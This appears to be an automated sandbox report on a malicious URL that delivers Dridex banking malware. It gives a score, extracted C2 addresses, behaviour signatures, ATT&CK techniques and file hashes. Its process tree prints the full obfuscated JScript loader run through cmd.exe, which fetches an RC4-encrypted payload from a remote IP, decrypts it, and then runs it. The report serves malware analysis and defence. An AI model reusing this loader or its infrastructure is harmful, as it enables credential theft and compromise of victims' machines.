Overview

overview

10

Static

static

URLScan

urlscan

https://exitmagall.x...

windows7_x64

6

https://exitmagall.x...

windows10_x64

10

Analysis

  • max time kernel
    148s
  • max time network
    156s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21-06-2021 05:06

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://exitmagall.xyz/iduew73

  • Sample

    210621-mykyk3wv4n

Score
10/10
dridex10111botnetdiscoveryevasiontrojan

Malware Config

Extracted

Family

dridex

Botnet

10111

C2

139.59.59.242:443

91.207.28.33:13786

178.128.197.110:4664
rc4.plain
rc4.plain

Signatures

  • Dridex

    Dridex(known as Bugat/Cridex) is a form of malware that specializes in stealing bank credentials.

    botnetdridex
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 40 IoCs
    adwarespyware
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:4480
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4480 CREDAT:82945 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Windows\SysWOW64\cmd.exe
        cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4016
        • C:\Windows\SysWOW64\wscript.exe
          wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://188.227.84.168/?NjIyNzQ=&rSPCaVF&oafghc1n4=w3_QMvXcJx7QFYPJKfrcT&s2hdfgdfgt4=6NbP07YA0SD2I_fz-3ORZ3xOWPPk7HPRAOzrl6CelTR8fAlLOECbgK3iheIfgdhmoheVllC9fv4ikDXmEPP1JTQqBWJUQhC96LIVLI46A&end=arena&start=why&yus=118dbobs.119ok77.406b8c6j3&nhyOqlCMTY1MTA=" "2""
          4⤵
          • Blocklisted process makes network request
          • Suspicious use of WriteProcessMemory
          PID:768
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /c buc10.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4268
            • C:\Users\Admin\AppData\Local\Temp\buc10.exe
              buc10.exe
              6⤵
              • Executes dropped EXE
              • Checks whether UAC is enabled
              PID:4280

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    a64e2d26dd6f37ed569251d6dfc524ca

    SHA1

    8133be8cb0509b8e3ed907715e8df1785c555c6e

    SHA256

    4ca0b012928887c383bce5a4a38f87e85ff1fc9720b0f5ad0aec0bec982e3cdc

    SHA512

    a00f8a5ea363e36f56a309becc2faa3ccbf1c5c32671da78338b526d634b0f4c074d44a69280f5d6b629ec050a87950b1236ed7c2650abc1d26b9cdbd3cfbfdd

    Download Submit
  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
    MD5

    5bbd3ec3dff6d6862e6593835cb7ee96

    SHA1

    0432100849d8e576738c47c29947bd75188a43d3

    SHA256

    1976c6c5336d2617a01aca1ea9c37e54c16631f23393e202e54d9f6a42a6eebf

    SHA512

    eb35fa3839aa265a457e89338ba150fd6c35a282aa047a3f6eef2fc484047ad24b4b6baf49f3a60538902a6082174037de6cc5f5141d52f6e0e883ec40bd5859

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\LZQJAN73.cookie
    MD5

    ca8b70c46725556f8dbe80a44b68ab16

    SHA1

    7e821dc28878b84c5def01256e70d720c6c17c0e

    SHA256

    d06e61f584d0223a65a9acae6a3feb444bc299d3b840a9073b7bdbc7011484cf

    SHA512

    3171e78ff7aaa94d3598bc5bb4ddb426fcd05e78f3d65f9a0d17f5b897f0c6d875b77fc98b63d58702621bf82c786faa2b66a2b9130f61de324f7ba756871133

    Download Submit
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\TGWWQG9R.cookie
    MD5

    e2ebdfed3499bea3ba6fa6e756060948

    SHA1

    23be95d327bdb6c2bf26efc906560ea2ba3b6cab

    SHA256

    1603d3f773d78c156c248fd19b7319736e7686cb4805e51beda8a66f5cf623b2

    SHA512

    01133dada21698e2a35308f6acf0393078545aef43a647dfe1704a9d0b994f18c4e0b46f9e0c72446fbce9d8344890a2dca740186ec2c6f2a2efa2950c79db76

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\3.tMp
    MD5

    60fc00422b399db85f87d41b8328976d

    SHA1

    bb85034acad8025f97e5bb236443debaf8926e4b

    SHA256

    c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690

    SHA512

    16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\buc10.exe
    MD5

    dea4a7e0d6430869ba9b80d841293e07

    SHA1

    34f609fcd39daae376fd266c7e57d099ecfe19d1

    SHA256

    3339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69

    SHA512

    f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a

    Download Submit
  • C:\Users\Admin\AppData\Local\Temp\buc10.exe
    MD5

    dea4a7e0d6430869ba9b80d841293e07

    SHA1

    34f609fcd39daae376fd266c7e57d099ecfe19d1

    SHA256

    3339390888ea181b768ea5a5aa34f537d73705cfe60fdc163e6024e157e8ee69

    SHA512

    f6fcd8696fefbfe143389e38fc9915dfb6696d8444e9e497932ce464f963c539f3da2c87ce91802ef65af6ff5c14386dfddc945dc735708fa5b29b8809770e0a

    Download Submit
  • memory/768-117-0x0000000000000000-mapping.dmp
    Download
  • memory/4016-116-0x0000000000000000-mapping.dmp
    Download
  • memory/4268-119-0x0000000000000000-mapping.dmp
    Download
  • memory/4280-120-0x0000000000000000-mapping.dmp
    Download
  • memory/4280-123-0x00000000020A0000-0x00000000020DC000-memory.dmp
    Filesize

    240KB

    Download
  • memory/4280-124-0x0000000000400000-0x0000000000578000-memory.dmp
    Filesize

    1.5MB

    Download
  • memory/4480-114-0x00007FF9EB810000-0x00007FF9EB87B000-memory.dmp
    Filesize

    428KB

    Download
  • memory/4796-115-0x0000000000000000-mapping.dmp
    Download